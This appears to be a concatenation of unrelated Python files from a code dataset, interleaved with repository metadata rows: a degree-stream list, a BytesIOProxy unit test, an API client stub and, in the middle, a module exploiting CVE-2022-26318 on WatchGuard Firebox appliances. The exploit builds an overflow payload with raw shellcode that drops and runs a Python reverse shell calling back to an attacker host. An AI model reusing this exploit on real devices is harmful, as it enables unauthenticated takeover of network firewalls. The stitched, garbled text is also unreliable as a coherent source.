'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (5 Years, Bachelor and Master of Technology (DualDegree))' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Instrumentation and Control Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (5 Years, Bachelor and Master ofTechnology (Dual Degree))' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Industrial Design (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Engineering (4 Years, Bachelor of Technology)' ,
'Production and Industrial Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'B. Tech. Electronics and Communication Engineering and M. Tech.Electronics and Communication Engineering with specialization in Communication Systems Design (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Mining Engineering (5 Years, Bachelor and Master of Technology (DualDegree))' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Materials Science and Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Chemistry (5 Years, Integrated Master of Science)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Telecommunication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Physics (5 Years, Integrated Master of Science)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Medical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering with specialization in Design andManufacturing (4 Years, Bachelor of Technology)' ,
'Materials Science and Metallurgical Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Ceramic Engineering (4 Years, Bachelor of Technology)' ,
'Production and Industrial Engineering (4 Years, Bachelor of Technology)' ,
'Materials Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mathematics (5 Years, Integrated Master of Science)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Food Process Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Engineering Physics (5 Years, Bachelor and Master of Technology (DualDegree))' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Ceramic Engineering and M.Tech Industrial Ceramic (5 Years, Bachelor andMaster of Technology (Dual Degree))' ,
'Production and Industrial Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'B. Tech. Mechanical Engineering and M. Tech. in Mechanical Engineeringwith specialization in Product Design (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Smart Manufacturing (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'Industrial and Production Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Physics (5 Years, Integrated Master of Science)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgy and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering with specialization in Design and Manufacturing (4 Years,Bachelor of Technology)' ,
'Physics (5 Years, Bachelor of Science and Master of Science (Dual Degree))' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Mathematics (5 Years, Integrated Master of Science)' ,
'Electronics and Communication Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'B. Tech. Mechanical Engineering and M. Tech. Mechanical Engineeringwith specialization in Advanced Manufacturing (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Production Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Textile Technology (4 Years, Bachelor of Technology)' ,
'Mechatronics Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (Plastic and Polymer) (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics System Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemistry (5 Years, Integrated Master of Science)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Biotechnology (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Materials and Metallurgical Engineering (4 Years, Bachelor of Technology)' ,
'Production Engineering (4 Years, Bachelor of Technology)' ,
'Chemistry (5 Years, Integrated Master of Science)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Biotechnology and Biochemical Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Life Science (5 Years, Integrated Master of Science)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Chemistry (5 Years, Integrated Master of Science)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Medical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Chemistry (5 Years, Bachelor of Science and Master of Science (DualDegree))' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Instrumentation Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Metallurgy and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Instrumentation and Control Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Manufacturing Engineering (4 Years, Bachelor of Technology)' ,
'Agricultural Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Food Engineering and Technology (4 Years, Bachelor of Technology)' ,
'Carpet and Textile Technology (4 Years, Bachelor of Technology)' ,
'Industrial and Production Engineering (4 Years, Bachelor of Technology)' ,
'Food Technology (4 Years, Bachelor of Technology)' ,
'Food Technology (4 Years, Bachelor of Technology)' ,
'Food Engineering and Technology (4 Years, Bachelor of Technology)' ,
'Food Technology and Management (4 Years, Bachelor of Technology)' ,
]
"""import itertools
i = 1
for (colle , stre) in zip(colleges,Streams):
print(colle, stre)
i += 1
print(i)"""
| 61.241287
| 220
| 0.787068
| 5,205
| 45,686
| 6.908549
| 0.045341
| 0.166857
| 0.129258
| 0.205095
| 0.967101
| 0.942462
| 0.90859
| 0.876804
| 0.855002
| 0.787035
| 0
| 0.009226
| 0.129296
| 45,686
| 746
| 221
| 61.241287
| 0.894718
| 0
| 0
| 0.93188
| 0
| 0.010899
| 0.919163
| 0.013736
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
de0ff8359ff0698915c38c018a40776da150c11e
| 4,046
|
py
|
Python
|
arxiv/canonical/services/tests/test_readable.py
|
arXiv/arxiv-canonical
|
a758ed88a568f23a834288aed4dcf7039c1340cf
|
[
"MIT"
] | 5
|
2019-05-26T22:52:54.000Z
|
2021-11-05T12:27:11.000Z
|
arxiv/canonical/services/tests/test_readable.py
|
arXiv/arxiv-canonical
|
a758ed88a568f23a834288aed4dcf7039c1340cf
|
[
"MIT"
] | 31
|
2019-06-24T13:51:25.000Z
|
2021-11-12T22:27:10.000Z
|
arxiv/canonical/services/tests/test_readable.py
|
arXiv/arxiv-canonical
|
a758ed88a568f23a834288aed4dcf7039c1340cf
|
[
"MIT"
] | 4
|
2019-01-10T22:01:54.000Z
|
2021-11-05T12:26:58.000Z
|
import io
from unittest import TestCase, mock
from ..readable import BytesIOProxy
class TestBytesIOProxy(TestCase):
def setUp(self):
"""Create a new BytesIOProxy."""
self.test_content = b'test content'
self.mock_read = mock.MagicMock()
self.mock_read.return_value = self.test_content
self.readable = BytesIOProxy(self.mock_read)
def test_read(self):
"""Read from a :class:`BytesIOProxy`."""
self.assertEqual(self.mock_read.call_count, 0,
'Passed callable not yet used')
self.assertEqual(self.readable.read(), self.test_content,
'Content is read from passed callable')
self.assertEqual(self.mock_read.call_count, 1,
'Passed callable has been used')
def test_read_again(self):
"""Read more than once from a :class:`BytesIOProxy`."""
self.assertEqual(self.mock_read.call_count, 0,
'Passed callable not yet used')
self.assertEqual(self.readable.read(), self.test_content,
'Content is read from passed callable')
self.assertEqual(self.mock_read.call_count, 1,
'Passed callable has been used')
self.readable.seek(0)
self.assertEqual(self.readable.read(), self.test_content,
'The same content is read')
self.assertEqual(self.mock_read.call_count, 1,
'Passed callable is not called a second time')
def test_not_closed_before_loading_content(self):
"""BytesIOProxy is not closed prior to loading content."""
self.assertFalse(self.readable.closed, 'Readable is not closed')
def test_not_closed_after_loading_content(self):
"""BytesIOProxy is not closed after loading content."""
self.assertEqual(self.readable.read(), self.test_content,
'Content is read from passed callable')
self.assertFalse(self.readable.closed, 'Readable is not closed')
def test_closed_after_explicit_close(self):
"""BytesIOProxy is closed after being explicitly closed."""
self.assertFalse(self.readable.closed, 'Readable is not closed')
self.readable.close()
self.assertTrue(self.readable.closed, 'Readable is closed')
def test_closed_after_read_and_explicit_close(self):
"""BytesIOProxy is closed after being explicitly closed."""
self.assertEqual(self.readable.read(), self.test_content,
'Content is read from passed callable')
self.assertFalse(self.readable.closed, 'Readable is not closed')
self.readable.close()
self.assertTrue(self.readable.closed, 'Readable is closed')
def test_readable_before_loading_content(self):
"""BytesIOProxy is readable prior to loading content."""
self.assertTrue(self.readable.readable(), 'Readable is readable')
def test_readable_after_loading_content(self):
"""BytesIOProxy is readable after loading content."""
self.assertEqual(self.readable.read(), self.test_content,
'Content is read from passed callable')
self.assertTrue(self.readable.readable(), 'Readable is readable')
def test_not_readable_after_explicit_close(self):
"""BytesIOProxy is not readable after being explicitly closed."""
self.assertTrue(self.readable.readable(), 'Readable is readable')
self.readable.close()
with self.assertRaises(ValueError):
self.readable.readable()
def test_not_readable_after_read_and_explicit_close(self):
"""BytesIOProxy is not readable after being explicitly closed."""
self.assertEqual(self.readable.read(), self.test_content,
'Content is read from passed callable')
self.assertTrue(self.readable.readable(), 'Readable is readable')
self.readable.close()
with self.assertRaises(ValueError):
self.readable.readable()
| 47.046512
| 73
| 0.654968
| 469
| 4,046
| 5.509595
| 0.132196
| 0.116099
| 0.088235
| 0.073142
| 0.847136
| 0.823142
| 0.765093
| 0.733359
| 0.706269
| 0.706269
| 0
| 0.00197
| 0.247405
| 4,046
| 86
| 74
| 47.046512
| 0.846634
| 0.133712
| 0
| 0.645161
| 0
| 0
| 0.177681
| 0
| 0
| 0
| 0
| 0
| 0.387097
| 1
| 0.177419
| false
| 0.177419
| 0.048387
| 0
| 0.241935
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a9cf9532ce34fe32da63ac38544622129d8143d1
| 77
|
py
|
Python
|
train/treegen/preprocess/__init__.py
|
dngu7/honeycode
|
d7a00408f8370f3fea8ca1a94b239f3e4d842a7d
|
[
"MIT"
] | 1
|
2021-03-25T10:11:21.000Z
|
2021-03-25T10:11:21.000Z
|
train/treegen/preprocess/__init__.py
|
dngu7/honeycode
|
d7a00408f8370f3fea8ca1a94b239f3e4d842a7d
|
[
"MIT"
] | null | null | null |
train/treegen/preprocess/__init__.py
|
dngu7/honeycode
|
d7a00408f8370f3fea8ca1a94b239f3e4d842a7d
|
[
"MIT"
] | 1
|
2020-11-20T00:13:16.000Z
|
2020-11-20T00:13:16.000Z
|
from preprocess import graph_loader
from preprocess import local_graph_loader
| 38.5
| 41
| 0.909091
| 11
| 77
| 6.090909
| 0.545455
| 0.41791
| 0.597015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 77
| 2
| 41
| 38.5
| 0.957143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a9e2cdc30d31cd9ff7961adbfac292124af2b56d
| 5,324
|
py
|
Python
|
modules/cves/2022/CVE-2022-26318.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 106
|
2022-03-18T06:51:09.000Z
|
2022-03-31T19:11:41.000Z
|
modules/cves/2022/CVE-2022-26318.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 5
|
2022-03-27T07:37:32.000Z
|
2022-03-31T13:56:11.000Z
|
modules/cves/2022/CVE-2022-26318.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 30
|
2022-03-21T01:27:08.000Z
|
2022-03-31T12:28:01.000Z
|
import socket
import ssl
import gzip
from urllib.parse import urlparse
from plugins.oob import gen_oob_domain, verify_request
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''WatchGuard Unauth RCE''',
"description": '''On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.''',
"severity": "critical",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-26318",
"https://github.com/Throns1956/watchguard_cve-2022-26318"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "9.8",
"cve-id": "CVE-2022-26318",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2022", "watchguard", "rce", "unauth"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
url = format_url(url)
o = urlparse(url)
host = o.hostname
oob_domain, flag = gen_oob_domain()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
wrappedSocket = ssl.wrap_socket(sock=sock, cert_reqs=ssl.CERT_NONE)
server_address = (host, 4117)
wrappedSocket.settimeout(3)
try:
wrappedSocket.connect(server_address)
payload = buildHTTP(oob_domain, host)
wrappedSocket.sendall(payload)
if verify_request("dns", flag):
result["success"] = True
result["info"] = info()
result["payload"] = url
except:
result["success"] = False
finally:
wrappedSocket.close()
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
def buildPayload(L_HOST):
payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><".encode()
payload += ("A"*3181).encode()
payload += "MFA>".encode()
payload += ("<BBBBMFA>"*3680).encode()
payload += b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/usr/bin/python\x00/tmp/test.py\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\x01\x00\x00\x00\x00\x00\x00'
payload += 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{}",8888)); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);call(["/bin/python","-i"]);'.format(L_HOST).encode()
return gzip.compress(payload, 9)
def buildHTTP(L_HOST, R_HOST):
http_payload = "POST /agent/login HTTP/1.1\r\n"
http_payload += "Host: {}:4117\r\n".format(R_HOST)
http_payload += "User-Agent: CVE-2022-26318\r\n"
http_payload += "Accept-Encoding: gzip, deflate\r\n"
http_payload += "Accept: */*\r\n"
http_payload += "Connection: close\r\n"
http_payload += "Content-Encoding: gzip\r\n"
gzippedExploit = buildPayload(L_HOST)
http_payload += "Content-Length: {}\r\n".format(len(gzippedExploit))
http_payload += "\r\n"
return http_payload.encode() + gzippedExploit
| 51.192308
| 2,038
| 0.665665
| 926
| 5,324
| 3.785097
| 0.240821
| 0.662482
| 0.914123
| 1.150357
| 0.384308
| 0.344936
| 0.3398
| 0.3398
| 0.316976
| 0.309272
| 0
| 0.226641
| 0.135612
| 5,324
| 104
| 2,039
| 51.192308
| 0.534985
| 0.016529
| 0
| 0
| 0
| 0.063291
| 0.606959
| 0.435863
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088608
| false
| 0
| 0.075949
| 0.037975
| 0.253165
| 0.012658
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e72aba29ed16bbe711a36191cfd2cdbda7ef4f99
| 118,597
|
py
|
Python
|
libs/PureCloudPlatformClientV2/apis/gamification_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 1
|
2021-10-08T20:46:45.000Z
|
2021-10-08T20:46:45.000Z
|
libs/PureCloudPlatformClientV2/apis/gamification_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | null | null | null |
libs/PureCloudPlatformClientV2/apis/gamification_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
GamificationApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class GamificationApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def get_gamification_leaderboard(self, start_workday, end_workday, **kwargs):
"""
Leaderboard of the requesting user's division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_leaderboard(start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date start_workday: Start workday to retrieve for the leaderboard. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday to retrieve for the leaderboard. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str metric_id: Metric Id for which the leaderboard is to be generated. The total points is used if nothing is given.
